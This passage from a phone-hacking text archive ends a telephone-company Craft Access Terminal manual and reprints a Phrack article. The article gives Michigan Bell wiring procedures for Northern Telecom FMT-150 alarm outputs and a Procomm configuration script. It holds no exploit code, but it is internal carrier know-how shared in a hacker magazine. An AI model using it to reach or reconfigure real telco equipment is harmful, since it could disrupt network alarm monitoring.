  6708.         Reading Information Stored in the Craft Access Terminal
  6709.  
  6710.  
  6711.          Some of the information sent to you from the computer may be
  6712.           stored in the Craft Access Terminal in case you need it again
  6713.           later, even if your terminal is disconnected as long as its
  6714.           battery pack is charged. If you want to see stored
  6715.           information, move the switch to either Monitor or Voice and
  6716.           point to REVIEW (move the Pointer to the bottom center and
  6717.           press).
  6718.  
  6719.  
  6720.          A list containing the major categories of information currently
  6721.           stored in your Craft Access Terminal will appear on the
  6722.           screen. To select a category, move the Pointer along the right
  6723.           side until the arrow (>) is beside the category that you want
  6724.           to select and then press the Pointer.
  6725.  
  6726.          Sometimes an item that you have selected leads to another list.
  6727.           Make a selection from this list in the same way you did on the
  6728.           previous list. To quit reading, point to BACK (move the
  6729.           Pointer to the top center and press). To reread pages of
  6730.           stored information, point to REVIEW (move the Pointer to the
  6731.           bottom center position) and then press the Pointer.
  6732.  
  6733.  
  6734.  
  6735.  
  6736.  
  6737.  
  6738.                                       -19-
  6739.  
  6740.  
  6741.  
  6742.  
  6743.         -----------------------------------------------------------
  6744.  
  6745.  
  6746.         Filling in Information on the Craft Access Terminal
  6747.  
  6748.          If a screen contains a space where a number can be filled in,
  6749.           the cursor will be blinking at the space. If there is already
  6750.           a number in the space you may want to change it. If you decide
  6751.           to use the number that is already shown, point to NEXT (move
  6752.           the Pointer to any position on the right side and press).
  6753.  
  6754.          If you want to change the number, press the asterisk (*) to
  6755.           erase the wrong number, then fill in the number you want.
  6756.  
  6757.          When the desired number is shown, point to NEXT (move the
  6758.           Pointer to any position on the right side and press).
  6759.  
  6760.  
  6761.  
  6762.                                       -20-
  6763.  
  6764.  
  6765.  
  6766.  
  6767.         -----------------------------------------------------------
  6768.  
  6769.  
  6770.  
  6771.  
  6772.          Sometimes you may need to return to a screen to correct an
  6773.           entry.
  6774.  
  6775.          When you point to BACK (move the Pointer to the top center and
  6776.           press), the cursor will appear at the beginning of the first
  6777.           place where information was filled in.
  6778.  
  6779.          Press the asterisk (*) on the keypad to erase the entered
  6780.           number or make a correction by typing over the incorrect
  6781.           number with the correct number.
  6782.  
  6783.  
  6784.  
  6785.                                       -21-
  6786.  
  6787.  
  6788.  
  6789.  
  6790.         -----------------------------------------------------------
  6791.  
  6792.  
  6793.  
  6794.          If there are several spaces to be filled in on one screen, move
  6795.           the Pointer along the right side of the control to point to
  6796.           each location where you can enter information. Don't press the
  6797.           Pointer until you have filled in all the required information.
  6798.  
  6799.          If a space where information can be filled in is preceded with
  6800.           an asterisk (*), the information is optional and the space may
  6801.           be left without an entry.
  6802.  
  6803.          After you have filled in all of the information you need, point
  6804.           to NEXT (move the Pointer to any position on the right side
  6805.           and press).
  6806.  
  6807.          Display of the asterisk is actually controlled by the Craft
  6808.           Access System computer. Keep in mind that this can change.
  6809.  
  6810.  
  6811.                                       -22-
  6812.  
  6813.  
  6814.  
  6815.  
  6816.         -----------------------------------------------------------
  6817.  
  6818.  
  6819.  
  6820.  
  6821.          Sometimes the Craft Access System will allow you to enter the
  6822.           letters and punctuation marks to fill in the information that
  6823.           is needed. Whenever this is the case, this screen is
  6824.           displayed.
  6825.  
  6826.         Entering Alphabetical and Numeric Characters
  6827.  
  6828.          Letters, numbers and punctuation marks are entered from the
  6829.           keypad. All characters you enter appear on the screen.
  6830.  
  6831.          Each key is used to enter four different characters as labeled
  6832.           on the key; except for the [#] key. The [SP] on the [#] key is
  6833.           used to enter a space between two words.
  6834.  
  6835.          Two easy methods can be used to enter characters:
  6836.  
  6837.          - Method 1: Press and hold down the key with the desired
  6838.            character. Look at the display while holding down the key.
  6839.            You will see each character labeled on that key appear one
  6840.            after the other. When the desired character appears, release
  6841.            the key and that character will remain on the screen, and the
  6842.            cursor will advance to the next position.
  6843.  
  6844.          - Method 2: There is no need to continuously watch the screen
  6845.            with this method. Instead of holding down the key you rapidly
  6846.            tap the key a number of times equal to the position of the
  6847.            desired character on that key.
  6848.  
  6849.            For example, tap the [6] key three times to enter [N]; tap
  6850.            the [3] key three times to enter [E]; tap the [9] key twice
  6851.            to enter [w] and tap the [#] key twice to enter a space.
  6852.  
  6853.          A blinking dark block on the screen indicates you have entered
  6854.           you last character.
  6855.  
  6856.  
  6857.                                       -23-
  6858.  
  6859.  
  6860.  
  6861.  
  6862.         -----------------------------------------------------------
  6863.  
  6864.  
  6865.         Erasing a Character, an Entire Line or more.
  6866.  
  6867.          If you want to erase a character, push the pointer to the left
  6868.           and press once. Holding the pointer down it will continue to
  6869.           erase characters one at a time until it is released.
  6870.  
  6871.         Sending Your Message to the Computer
  6872.  
  6873.          When you are through entering the message, move the pointer to
  6874.           the right and press it to send your message. The cursor should
  6875.           stop blinking to indicate that your message has been sent.
  6876.  
  6877.  
  6878.                                       -24-
  6879.  
  6880.  
  6881.  
  6882.  
  6883.         -----------------------------------------------------------
  6884.  
  6885.  
  6886.         Taking Care of Your Terminal
  6887.  
  6888.          1. To avoid damaging the Craft Access Terminal
  6889.  
  6890.           - Don't drop the terminal. During the work day, the Craft
  6891.             Access Terminal should be in the cab of your vehicle or
  6892.             clipped to your tool belt when not in use
  6893.  
  6894.           - Don't unnecessarily expose the terminal to dust, sand,
  6895.             water, or salt air.
  6896.  
  6897.          2. Problems Caused by Extreme Temperatures
  6898.  
  6899.            Heat
  6900.  
  6901.            The Craft Access Terminal can be damaged by extreme Heat.
  6902.            DON'T LEAVE IT ON THE DASH OF YOUR VEHICLE.
  6903.  
  6904.            Cold
  6905.  
  6906.            Cold is less likely to damage the terminal. However, the
  6907.            screen won't work properly at temperatures less than -20
  6908.            degrees Fahrenheit. If you must use your terminal in colder
  6909.            temperatures, you can use it for about 20 minutes in the
  6910.            cold, then place it somewhere warm for 15 to 30 minutes and
  6911.            then use it in the cold again.
  6912.  
  6913.          3. Problems Caused by Water, Condensation, and High Humidity.
  6914.  
  6915.            Don't expose the terminal to water; especially avoid dropping
  6916.            the terminal in water. If it does get wet, dry it immediately.
  6917.            The Craft Access Terminal will work in rain or snow, but
  6918.            should be wiped dry whenever possible.
  6919.  
  6920.          4. How to store the Craft Access Terminal and spare batteries.
  6921.  
  6922.            When not in use, the Craft Access Terminal or spare battery
  6923.            pack should be connected to the charger.
  6924.  
  6925.          5. Under some abnormal conditions, the terminal may lock itself
  6926.             into an incorrect state. To "reset" the terminal, simply
  6927.             insert the battery charger plug into the charge jack, then
  6928.             remove. CAUTION: This will erase any stored information.
  6929.  
  6930.  
  6931.  
  6932.  
  6933.                                       -25-
  6934.  
  6935.  
  6936.  
  6937.  
  6938.         -----------------------------------------------------------
  6939.  
  6940.  
  6941.         For Quick Reference:
  6942.  
  6943.  
  6944.  
  6945.                             .-------------------------------------.
  6946.                             : -To quit reading stored information :
  6947.                             : -To go back to a screen you saw     :
  6948.                             :   previously                        :
  6949.                             :        .----------------------------'
  6950.                             : BACK   :
  6951.   .-----------------------. :        : .---------------------------.
  6952.   :                   b   : :   O    : :                           :
  6953.   : -To get           a O : `--------' :O n S -to select a choice  :
  6954.   :  explanation of H c   :            :                           :
  6955.   :  selectable     E k O :            :O e E -to read new page of :
  6956.   :  items          L s   : (JOYSTICK) :       help or new page of :
  6957.   :                 P p O :            :O x N  stored information  :
  6958.   : -To erase a       a   :            :                           :
  6959.   :  character or     c O : .--------. :O t D -to send mail        :
  6960.   :  line             e   : :   O    : `---------------------------'
  6961.   :                       : : REVIEW :
  6962.   :  (ALPHA-ENTRY)        : :        `-------------------------.
  6963.   :   (MODE ONLY)         : :                                  :
  6964.   `-----------------------' :                                  :
  6965.                             : -To read information stored in   :
  6966.                             :  the Craft Access Terminal       :
  6967.                             :                                  :
  6968.                             : -To read previous page of help   :
  6969.                             :  or store information            :
  6970.                             :                                  :
  6971.                             `----------------------------------'
  6972.  
  6973.  
  6974.      -----------------------------------------------------------
  6975.  
  6976.  
  6977.           FCC Regulations for Telephone Equipment
  6978.           (you know all this crap)
  6979.  
  6980.  
  6981.  
  6982.  
  6983.      -----------------------------------------------------------
  6984.  
  6985.         (BACK COVER)
  6986.  
  6987.               (END)
  6988.  
  6989.           -------------------------------------------------------
  6990.  
  6991.  
  6992.         Few last notes:
  6993.  
  6994.         The real Craft handsets do not have a power switch, they just
  6995.          sit on all of the time. So we could also add a power switch to
  6996.          ours.
  6997.  
  6998.         The Craft handset uses a 1200 baud modem, but seems to be
  6999.          incompatible with standard modems...
  7000.  
  7001.                               ==Phrack Magazine==
  7002.  
  7003.                  Volume Seven, Issue Forty-Eight, File 9 of 18
  7004.  
  7005. ---------------------------------------------------------------------------
  7006.         Information about Northern Telecom's FMT-150B/C/D
  7007.                 Written by StaTiC
  7008.                 (statik@free.org)
  7009. --------------------------------------------------------------------------- 
  7010.  
  7011.         Ok, I know someone wrote an article in Phrack about the
  7012. FMT-150B/C/D, but I figured I should write some more.  I am not going to
  7013. write the same info that FyberLyte wrote, in fact I recommend you go and
  7014. check it out.  It is in Phrack #44-13.  This is some stuff I obtained,
  7015. that I figured the rest of the world would be interested in.
  7016.  
  7017. Included info:     Connecting a FMT-150 to a Rockwell OS-35
  7018.         Connecting Environmental Alarms to the FMT-150
  7019.         Procomm Script to Perform Configuration of FMT-150
  7020.         FMT-150 Configuration Checklist 
  7021.         Glossary of Terms
  7022.  
  7023.  
  7024. ------------------------------------------------------------------------------
  7025.  
  7026.             INSTRUCTIONS FOR X-CONNECTING FMT-150 CUSTOMER OUTPUT TO
  7027.                               ROCKWELL OS-35 INPUTS
  7028.  
  7029.      A pin block will be provided at the central office location, in the
  7030.      bay equipped with FMT-150 equipment.  The pin block will provide
  7031.      the termination points for the Rockwell OS-35A and the FMT-150
  7032.      customer output alarms. Each pin block will be able to support a
  7033.      maximum of 16 FMT-150 systems, see pin block diagram.
  7034.  
  7035.      Wiring of the FMT-150 customer outputs points and the OS-35A points
  7036.      will be done by the vender on the back of the pin block.
  7037.  
  7038.      Once a FMT-150 system has been certified the certification team
  7039.      will be responsible for x-connecting the FMT-150 customer output
  7040.      alarm points to the appropriate OS-35A points on the front of the
  7041.      pin block. Completion of this x-connecting will allow FMT-150
  7042.      system alarms originating either from the CO or the RT to be
  7043.      transported via the OS-35A back to the Lightwave and Radio Alarm
  7044.      Center.
  7045.  
  7046.      IMPORTANT, MBT CERTIFICATION TEAMS X-CONNECT ONLY THE FMT-150 THAT
  7047.      IS BEING PUT INTO SERVICE AND ONLY AFTER THE ELECTRONICS ARE
  7048.      CERTIFIED.
  7049.  
  7050.      The FMT-150 16 customer outputs are defined as follows:
  7051.  
  7052.           OUTPUT        ALARM        OUTPUT        ALARM
  7053.           ------        -----        ------        -----
  7054.             1         BAY MAJOR        9          MI3 ALARM #3
  7055.             2         BAY MINOR        10         HSA ALARM
  7056.             3         OPT A FAIL       11         HSB ALARM
  7057.             4         OPT B FAIL       12         DS1 GRP FAIL
  7058.             5         STX TX           13         SYSTEM ID CLLI
  7059.             6         STS RX           14         COMM. EQUIP. ALARM
  7060.             7         M13 ALARM #1     15         NODE #1 CO
  7061.             8         M13 ALARM #2     16         NODE #2 REMOTE
  7062.  
  7063.      The Rockwell OS-35A provides a total of 32 separate alarm points.
  7064.      The first 16 points with the exception of point 13 have been
  7065.      multiplied on the pin block to provide x-connect points for a total
  7066.      of 16 FMT-150 systems, see pin block diagram.
  7067.  
  7068.      On the pin block x-connect the designated (1 of 16) FMT-150 system
  7069.      customer outputs, pins 1-12 and 14-16 to the appropriate OS-35A
  7070.      pins 1-12 and 14-16, see pin block diagram.
  7071.  
  7072.      Pins 17-32 on the pin block going to the OS-35A will be used for
  7073.      x-connecting the customer output #13 from each FMT-150 system.
  7074.      Customer output #13 provides the system ID for the FMT-150, see pin
  7075.      block diagram.
  7076.  
  7077.          X-CONNECT CUSTOMER OUTPUT #13 FROM FMT-150 SYSTEMS IN
  7078.          THIS SEQUENCE
  7079.  
  7080.                         OS-35A    FMT-150 System
  7081.                         ------    --------------
  7082.                         PIN 17      SYSTEM 1
  7083.                         PIN 18      SYSTEM 2
  7084.                           :            :
  7085.                           :            :
  7086.                         PIN 31      SYSTEM 15
  7087.                         PIN 32      SYSTEM 16
  7088.  
  7089.      AGAIN, WIRE ONLY THE FMT-150 SYSTEM THAT IS BEING PUT INTO SERVICE
  7090.      AND ONLY AFTER CERTIFICATION OF ELECTRONICS HAVE BEEN COMPLETED.
  7091.  
  7092.      After x-connects have been completed on FMT-150 system that has
  7093.      been certified, contact the Alarm Center at (313) 223-9688 and
  7094.      verify that all 16 customer output alarm conditions at both the CO
  7095.      and RT can be activated and are reporting via the OS-35A back to
  7096.      the alarm center.
  7097.  
  7098.      The Lightwave Alarm Center will monitor the FMT-150 system for a 24
  7099.      hour quiet period for alarms.  During this 24 hour period if no
  7100.      alarms are detected by the Lightwave Alarm Center, the FMT-150 will
  7101.      be considered certified for alarming and ready for continual
  7102.      monitoring.
  7103.  
  7104.      If during the 24 hour quiet period the alarm center receives alarms
  7105.      from the FMT-150 system, it will not be certified for continual
  7106.      monitoring and it will be the responsibility of the MBT
  7107.      Certification Teams to resolve those alarms.
  7108.  
  7109.  
  7110. ----------------------------------------------------------------------------
  7111.  
  7112.            INSTRUCTIONS FOR CROSS CONNECTING ENVIRONMENTAL ALARMS TO
  7113.                                THE FMT-150 INPUTS.
  7114.  
  7115.      Environmental alarms at remote locations may be connected to the
  7116.      FMT-150 customer inputs.  If more than one system exists, these
  7117.      alarms should only be connected to the first.  Since many remotes
  7118.      will not be equipped with all of these alarms, a checklist has been
  7119.      provided on the system acceptance sheets to indicate which have
  7120.      been wired.  The alarms provided for are Smoke Detector, Sump Pump,
  7121.      Open Door, AC Power Fail, HI-LO Temperature, Rectifier Fail, and
  7122.      Battery Float.  These are wired to pins D8 through E9 on the
  7123.      FMT-150 backplane.  See Shelf Backplane Detail, attached.
  7124.  
  7125.      All Customer Inputs are software connected to Customer Output #12.
  7126.      They will also bring in Bay Minor (Output #1) or Bay Major (Output
  7127.      #2) as appropriate.  Inputs #1 (Smoke Detector) and #2 (Sump Pump)
  7128.      are latching inputs that can only be cleared by accessing the MCU
  7129.      with a VT100 terminal.  See Section 321-3211-01, DP 3003, page 2.
  7130.  
  7131.      FMT-150 systems using external inputs for environmental alarms and
  7132.      which use E2 telemetry rather than the OS-35 MUST be provided with
  7133.      type NT7H90XH Maintenance Control Units at both ends.
  7134.  
  7135.      External alarm operation and telemetry if equipped, should be
  7136.      verified with the Alarm Center during acceptance.
  7137.  
  7138.  
  7139.  
  7140.  
  7141. --------------------------------------------------------------------------
  7142.         Procomm Script for Accessing FMT-150B/C/D
  7143.  
  7144. ;**********************************************************************
  7145. ;*                                                                    *
  7146. ;*    FMT150.CMD       Version 5.00        Dec 18, 1990               *
  7147. ;*    Please Destroy all previous versions of this program!           *
  7148. ;*                                                                    *
  7149. ;*    NOTE:  Procomm is a product of Datastorm Technologies           *
  7150. ;**********************************************************************
  7151. ;         
  7152. ;     The  script  FMT150.CMD was written to automatically  perform
  7153. ;     all  configuration commands for the Northern Telecom  FMT-150
  7154. ;     fiber  optic multiplexer.   Specifically,  this  script  will
  7155. ;     complete   over  125  configuration   commands   (performance
  7156. ;     threshold,  error correction,  and alarm outputs) as outlined
  7157. ;     in Section 4 of the Michigan Bell Certification Procedure for
  7158. ;     the   FMT-150.    This  program  is   compatible   with   all
  7159. ;     certification requirements for FMT-150  MCU NT7H90XA  or  MCU
  7160. ;     NT7H90XE.
  7161. ;    
  7162. ;     Requirements:
  7163. ;     1)  Toshiba T1000 craft terminal or DOS equivalent.
  7164. ;     2)  Proper serial cables and adapters.
  7165. ;     3)  Procomm disk with FMT150.CMD file.
  7166. ;    
  7167. ;     Procedure for use:
  7168. ;     1)  Remove disk from drive, then turn on computer.  When the DOS 
  7169. ;         prompt appears insert the PROCOMM disk into disk drive.  
  7170. ;         Enter the command "A:" + <ENTER>.
  7171. ;     2)  Enter the command "FIXPRN" + <ENTER>.
  7172. ;     3)  Enter the command "PROCOMM" + <ENTER>.
  7173. ;     4)  While holding the <ALT> key down, press the <D> key, 
  7174. ;         and select FMT-150 from the dialing menu.
  7175. ;     5)  Gain access to MCU as normal (press the <ENTER> key 3 times).
  7176. ;     6)  Once logged in, reset the MCU to factory default by
  7177. ;         entering "M"(aintenance) "R"(eset) "*"(all) + <ENTER>.
  7178. ;         It will take approximately three minutes to reconfigure.
  7179. ;     7)  Gain access to MCU again as in steps 3) & 4).
  7180. ;     8)  Select the script by pressing <ALT><F5> keys simultaneously.
  7181. ;     9)  When prompted for command file enter "FMT150" + <ENTER>.
  7182. ;     10) Answer questions and away you go!
  7183. ;
  7184. ; HISTORY: Version 4.00 May 15, 1990 by AQW final release version
  7185. ; HISTORY: Version 4.10 Aug 08, 1990 by JBH mod to use VPRINT to divert
  7186. ;          printer into a better bit bucket, and to correct callback #.
  7187. ; HISTORY: Version 4.12 Nov 21, 1990 by EEE to use Customer Inputs
  7188. ; HISTORY: Version 5.00 Dec 18, 1990 by JBH to update documentation
  7189. ;SN051690000
  7190. ;REFNO=5.00
  7191. CLEAR
  7192. PAUSE 1
  7193. ALARM 1
  7194. MESSAGE " "
  7195. MESSAGE "            *************************************************"
  7196. MESSAGE "            *                                               *"
  7197. MESSAGE "            * FMT-150 MCU NT7H90XC\CA CONFIGURATION PROGRAM *"
  7198. MESSAGE "            *         MCU NT7H90XE\EA CONFIGURATION PROGRAM *"
  7199. MESSAGE "            *                                               *"
  7200. MESSAGE "            *      VERSION 5.00         DEC 18, 1990        *"
  7201. MESSAGE "            *                                               *"
  7202. MESSAGE "            *       MICHIGAN BELL TELEPHONE COMPANY         *"
  7203. MESSAGE "            *           A DIVISION OF AMERITECH             *"
  7204. MESSAGE "            *                                               *"
  7205. MESSAGE "            *                                               *"
  7206. MESSAGE "            *************************************************"
  7207. MESSAGE " "
  7208. MESSAGE " "
  7209. MESSAGE "          ....TO EXIT THIS PROGRAM AT ANY TIME, PRESS <ESC>...."
  7210. PAUSE 3
  7211. ALARM 1
  7212.  
  7213. ;VARIABLE DOCUMENTATION
  7214. ;S0=CLLI A USER INPUT
  7215. ;S1=CLLI B USER INPUT
  7216. ;S2=CLLI LOCAL USER INPUT
  7217. ;S3=YEAR 2 DIGIT USER INPUT
  7218. ;S4=MONTH 2 DIGIT USER INPUT
  7219. ;S5=DAY 2 DIGIT USER INPUT
  7220. ;S6=HOUR 2 DIGIT USER INPUT
  7221. ;S7=MINUTE 2 DIGIT USER INPUT
  7222. ;S8=SYSTEM ID & USER RESPONSE USED TO CONTROL PROGRAM FLOW
  7223. ;S9=SYSTEM NUMBER
  7224.  
  7225. LABEL1:
  7226.  
  7227. ; note the following statement was superseded in version 4.10 by VPRINT
  7228. ;DOS "MODE LPT1:=COM2:" ; REQUIRED TO TURN PRINTER ERROR OFF
  7229. ; following flushes the "RUB" buffer
  7230. TRANSMIT "^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H"
  7231. CLEAR
  7232. LOCATE 10,2
  7233. MESSAGE "Enter CLLI code for LOCATION A (C.O.) using full 8 or 11 characters:"
  7234. LOCATE 12,2
  7235. GET S0 11 ;CLLI A
  7236. MESSAGE " "
  7237. CLEAR
  7238. LOCATE 10,2
  7239. MESSAGE "Enter CLLI code for LOCATION B (REMOTE) using full 8 or 11 characters:"
  7240. LOCATE 12,2
  7241. GET S1 11 ;CLLI B
  7242. MESSAGE " "
  7243. CLEAR
  7244. LOCATE 10,2
  7245. MESSAGE "Enter CLLI code for YOUR location using full 8 or 11 characters:"
  7246. LOCATE 12,2
  7247. GET S2 11
  7248.  
  7249. CLEAR
  7250. LOCATE 8,2
  7251. MESSAGE "Enter system ID without 'MI', for example ALBNMN-JCSNMN."
  7252. LOCATE 10,2
  7253. GET S8 13
  7254. LOCATE 13,2
  7255. MESSAGE "Enter system number, for example 1201 / T3X."
  7256. LOCATE 15,2
  7257. GET S9 15
  7258.  
  7259. TRANSMIT "CGNS"
  7260. TRANSMIT "`""
  7261. TRANSMIT S8
  7262. TRANSMIT "`""
  7263. TRANSMIT "!"
  7264.  
  7265. CLEAR
  7266. LOCATE 6,2
  7267. MESSAGE "Enter today's date."
  7268. LOCATE 8,2
  7269. MESSAGE "Enter two digit year + <ENTER>"
  7270. LOCATE 8,34
  7271. GET S3 2 ; 2 DIGIT YEAR
  7272. LOCATE 10,2
  7273. MESSAGE "Enter two digit month + <ENTER>.  Use 0's if required."
  7274. LOCATE 10,58
  7275. GET S4 2 ; 2 DIGIT MONTH
  7276. LOCATE 12,2
  7277. MESSAGE "Enter two digit day + <ENTER>.  Use 0's if required."
  7278. LOCATE 12,56
  7279. GET S5 2 ; 2 DIGIT DAY
  7280. CLEAR
  7281. LOCATE 6,2
  7282. MESSAGE "Enter time."
  7283. LOCATE 8,2
  7284. MESSAGE "Enter two digit hour + <ENTER>.  Use 0's if required."
  7285. LOCATE 8,57
  7286. GET S6 2 ; 2 DIGIT HOUR
  7287. LOCATE 10,2
  7288. MESSAGE "Enter two digit minute + <ENTER>.  Use 0's if required."
  7289. LOCATE 10,59
  7290. GET S7 2 ; 2 DIGIT MINUTE
  7291. CLEAR
  7292.  
  7293. ;SET TIME DP3025
  7294. TRANSMIT "CT"
  7295. TRANSMIT S6
  7296. TRANSMIT " "
  7297. TRANSMIT S7
  7298. TRANSMIT " !"
  7299. PAUSE 1
  7300. KFLUSH
  7301. RFLUSH
  7302. CLEAR
  7303.  
  7304. ;PROMPT THE USER TO CHECK INPUTS FOR LOCATIONS
  7305. LOCATE 1,2
  7306. MESSAGE "Please verify the following information."
  7307. LOCATE 4,2
  7308. MESSAGE "LOCATION A CLLI CODE = "
  7309. LOCATE 4,26
  7310. MESSAGE S0
  7311. LOCATE 6,2
  7312. MESSAGE "LOCATION B CLLI CODE = "
  7313. LOCATE 6,26
  7314. MESSAGE S1
  7315. LOCATE 8,2
  7316. MESSAGE "LOCAL LOCATION CLLI CODE ="
  7317. LOCATE 8,29
  7318. MESSAGE S2
  7319. LOCATE 10,2
  7320. MESSAGE "SYSTEM ID = "
  7321. LOCATE 10,17
  7322. MESSAGE S8
  7323. LOCATE 12,2
  7324. MESSAGE "SYSTEM NUMBER = "
  7325. LOCATE 12,21
  7326. MESSAGE S9
  7327. LOCATE 17,2
  7328. MESSAGE "IS INFORMATION CORRECT?  Y/N + <ENTER>"
  7329. LOCATE 17,44
  7330. GET S8 1
  7331. SWITCH S8
  7332.      CASE "Y"
  7333.           ;DO NOTHING
  7334.      ENDCASE
  7335.      DEFAULT
  7336.           GOTO LABEL1 ; JUMP TO TOP AND ENTER INFORMATION AGAIN
  7337.      ENDCASE
  7338. ENDSWITCH
  7339. CLEAR
  7340. LOCATE 8,15
  7341. MESSAGE "DO NOT PRESS ANY KEYS UNTIL CONFIGURATION COMPLETE"
  7342. LOCATE 10,15
  7343. MESSAGE "OK...HERE WE GO..."
  7344. ALARM 1
  7345. PAUSE 2
  7346.  
  7347. ;SET DATE DP3024
  7348. TRANSMIT "CD"
  7349. TRANSMIT S3
  7350. TRANSMIT " "
  7351. TRANSMIT S4
  7352. TRANSMIT " "
  7353. TRANSMIT S5
  7354. TRANSMIT " !"
  7355. PAUSE 1
  7356.  
  7357. ;NAME NODE 1 USING CENTRAL OFFICE CLLI CODE
  7358. TRANSMIT "CGNN1 "
  7359. TRANSMIT "`""
  7360. TRANSMIT S0
  7361. TRANSMIT "`""
  7362. TRANSMIT "!"
  7363.  
  7364. ;NAME NODE 2 USING REMOTE CLLI CODE
  7365. TRANSMIT "CGNN2 "
  7366. TRANSMIT "`""
  7367. TRANSMIT S1
  7368. TRANSMIT "`""
  7369. TRANSMIT "!"
  7370.  
  7371. ;DEFINE SITE
  7372. TRANSMIT "CGS1 1 2 !"
  7373. ;TRANSMIT "`""
  7374. ;TRANSMIT S0
  7375. ;TRANSMIT "`""
  7376. ;TRANSMIT S1
  7377. ;TRANSMIT " "
  7378. ;TRANSMIT "!"
  7379.  
  7380. ;CONFIGURE CUSTOMER OUTPUT POINTS DP3013
  7381. TRANSMIT "CGNO1 "
  7382. TRANSMIT "`"BAY MINOR`""
  7383. TRANSMIT "!"
  7384. TRANSMIT "CGNO2 "
  7385. TRANSMIT "`"BAY MAJOR`""
  7386. TRANSMIT "!"
  7387. TRANSMIT "CGNO3 "
  7388. TRANSMIT "`"OPT A FAIL`""
  7389. TRANSMIT "!"
  7390. TRANSMIT "CGNO4 "
  7391. TRANSMIT "`"OPT B FAIL`""
  7392. TRANSMIT "!"
  7393. TRANSMIT "CGNO5 "
  7394. TRANSMIT "`"STX TX`""
  7395. TRANSMIT "!"
  7396. TRANSMIT "CGNO6 "
  7397. TRANSMIT "`"STX RX`""
  7398. TRANSMIT "!"
  7399. TRANSMIT "CGNO7 "
  7400. TRANSMIT "`"M13 ALARM #1`""
  7401. TRANSMIT "!"
  7402. TRANSMIT "CGNO8 "
  7403. TRANSMIT "`"M13 ALARM #2`""
  7404. TRANSMIT "!"
  7405. TRANSMIT "CGNO9 "
  7406. TRANSMIT "`"M13 ALARM #3`""
  7407. TRANSMIT "!"
  7408. TRANSMIT "CGNO10 "
  7409. TRANSMIT "`"HSA ALARM`""
  7410. TRANSMIT "!"
  7411. TRANSMIT "CGNO11 "
  7412. TRANSMIT "`"HSB ALARM`""
  7413. TRANSMIT "!"
  7414. ;TRANSMIT "CGNO12 "
  7415. ;TRANSMIT "`"DS1 GRP FAIL`""
  7416. ;TRANSMIT "!"
  7417. TRANSMIT "CGNO13 "
  7418. TRANSMIT "`""
  7419. TRANSMIT S9
  7420. TRANSMIT "`""
  7421. TRANSMIT "!"
  7422. TRANSMIT "CGNO14 "
  7423. TRANSMIT "`"COM EQUIP ALRM`""
  7424. TRANSMIT "!"
  7425. TRANSMIT "CGNO15 "
  7426. TRANSMIT "`"NODE #1 CO`""
  7427. TRANSMIT "!"
  7428. TRANSMIT "CGNO16 "
  7429. TRANSMIT "`"NODE #2 REMOTE`""
  7430. TRANSMIT "!"
  7431.  
  7432. ;DELETE ALL EXISTING CUSTOMER OUTPUTS
  7433. TRANSMIT "CGO1 D*!"
  7434. TRANSMIT "CGO2 D*!"
  7435. TRANSMIT "CGO3 D*!"
  7436. TRANSMIT "CGO4 D*!"
  7437. TRANSMIT "CGO5 D*!"
  7438. TRANSMIT "CGO6 D*!"
  7439. TRANSMIT "CGO7 D*!"
  7440. TRANSMIT "CGO8 D*!"
  7441. TRANSMIT "CGO9 D*!"
  7442. TRANSMIT "CGO10 D*!"
  7443. TRANSMIT "CGO11 D*!"
  7444. TRANSMIT "CGO12 D*!"
  7445. TRANSMIT "CGO13 D*!"
  7446. TRANSMIT "CGO14 D*!"
  7447. TRANSMIT "CGO15 D*!"
  7448. TRANSMIT "CGO16 D*!"
  7449.  
  7450. ;CUSTOMER OUTPUTS 1-2
  7451. TRANSMIT "CGO1 AS1 G100 !"
  7452. TRANSMIT "CGO2 AS1 G120 !"
  7453.  
  7454. ;CUSTOMER OUTPUTS 3-9
  7455. TRANSMIT "CGO3 AS1 G107 !"
  7456. TRANSMIT "CGO4 AS1 G108 !"
  7457. TRANSMIT "CGO5 AS1 G101 !"
  7458. TRANSMIT "CGO5 AS1 G102 !"
  7459. TRANSMIT "CGO5 AS1 G103 !"
  7460. TRANSMIT "CGO6 AS1 G104 !"
  7461. TRANSMIT "CGO6 AS1 G105 !"
  7462. TRANSMIT "CGO6 AS1 G106 !"
  7463. TRANSMIT "CGO7 AS1 G109 !"
  7464. TRANSMIT "CGO8 AS1 G110 !"
  7465. TRANSMIT "CGO9 AS1 G111 !"
  7466.  
  7467. ;CUSTOMER OUTPUTS 10-11
  7468. TRANSMIT "CGO10 AS1 M1 MH18 !"
  7469. TRANSMIT "CGO10 AS1 M2 MH18 !"
  7470. TRANSMIT "CGO10 AS1 M3 MH18 !"
  7471. TRANSMIT "CGO11 AS1 M1 MH19 !"
  7472. TRANSMIT "CGO11 AS1 M2 MH19 !"
  7473. TRANSMIT "CGO11 AS1 M3 MH19 !"
  7474. ;TRANSMIT "CGO12 AS1 M1 1H2 !"
  7475. ;TRANSMIT "CGO12 AS1 M2 1H2 !"
  7476. ;TRANSMIT "CGO12 AS1 M3 1H2 !"
  7477. ;TRANSMIT "CGO12 AS1 M1 1H3 !"
  7478. ;TRANSMIT "CGO12 AS1 M2 1H3 !"
  7479. ;TRANSMIT "CGO12 AS1 M3 1H3 !"
  7480.  
  7481. ;CUSTOMER OUTPUT 13, 14
  7482. TRANSMIT "CGO13 AS1 G100 !"
  7483. TRANSMIT "CGO13 AS1 G120 !"
  7484. TRANSMIT "CGO14 AS1 G112 !"
  7485.  
  7486. ;CUSTOMER OUTPUTS 15, 16
  7487. TRANSMIT "CGO15 AN1 G100 !"
  7488. TRANSMIT "CGO15 AN1 G120 !"
  7489. TRANSMIT "CGO16 AN2 G100 !"
  7490. TRANSMIT "CGO16 AN2 G120 !"
  7491.  
  7492. ;SET TO AUTOMATIC CONTROL
  7493. TRANSMIT "CGO1 CA!"
  7494. TRANSMIT "CGO2 CA!"
  7495. TRANSMIT "CGO3 CA!"
  7496. TRANSMIT "CGO4 CA!"
  7497. TRANSMIT "CGO5 CA!"
  7498. TRANSMIT "CGO6 CA!"
  7499. TRANSMIT "CGO7 CA!"
  7500. TRANSMIT "CGO8 CA!"
  7501. TRANSMIT "CGO9 CA!"
  7502. TRANSMIT "CGO10 CA!"
  7503. TRANSMIT "CGO11 CA!"
  7504. TRANSMIT "CGO12 CA!"
  7505. TRANSMIT "CGO13 CA!"
  7506. TRANSMIT "CGO14 CA!"
  7507. TRANSMIT "CGO15 CA!"
  7508. TRANSMIT "CGO16 CA!"
  7509. ;
  7510. ;DEFINE CUSTOMER OUTPUT 12
  7511. TRANSMIT "CGO12 D*!"
